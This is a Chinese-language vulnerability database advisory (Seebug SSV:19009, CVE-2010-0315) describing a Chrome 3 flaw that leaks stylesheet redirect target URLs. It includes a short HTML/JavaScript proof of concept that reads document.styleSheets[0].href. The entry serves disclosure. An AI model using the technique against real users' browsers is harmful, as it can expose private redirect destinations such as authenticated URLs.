Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19009
HistoryJan 27, 2010 - 12:00 a.m.

Google Chrome样式表重新定向信息泄露漏洞

2010-01-2700:00:00
Root
www.seebug.org
9

0.055 Low

EPSS

Percentile

93.3%

JSON

BUGTRAQ ID: 37917
CVE ID: CVE-2010-0315

Google Chrome是Google发布的开源WEB浏览器。

Chrome跟随了样式表的重新定向并允许读取目标URL。通过在样式表LINK元素的HREF属性中放置站点URL然后读取 document.styleSheets[0].href属性值,攻击者就可以找到重新定向的目标URL。

Google Chrome 3.0.195.38
厂商补丁:

Google

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.google.com


                                                <link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>

Related

prion 1
openvas 2
cvelist 1
cve 1
nvd 1
debiancve 1
nessus 3
prion
prion
Code injection
2010-01-14 19:30:00
openvas
openvas
Google Chrome Multiple Vulnerabilities
2010-01-20 00:00:00
Google Chrome Multiple Vulnerabilities
2010-01-20 00:00:00
cvelist
cvelist
CVE-2010-0315
2010-01-14 19:00:00
cve
cve
CVE-2010-0315
2010-01-14 19:30:00
nvd
nvd
CVE-2010-0315
2010-01-14 19:30:00
debiancve
debiancve
CVE-2010-0315
2010-01-14 19:30:00
nessus
nessus
Google Chrome < 4.0.249.89 Multiple Vulnerabilities
2010-02-11 00:00:00
openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)
2011-05-05 00:00:00
openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)
2014-06-13 00:00:00

0.055 Low

EPSS

Percentile

93.3%

JSON
Related for SSV:19009
prion1openvas2cvelist1cve1nvd1debiancve1nessus3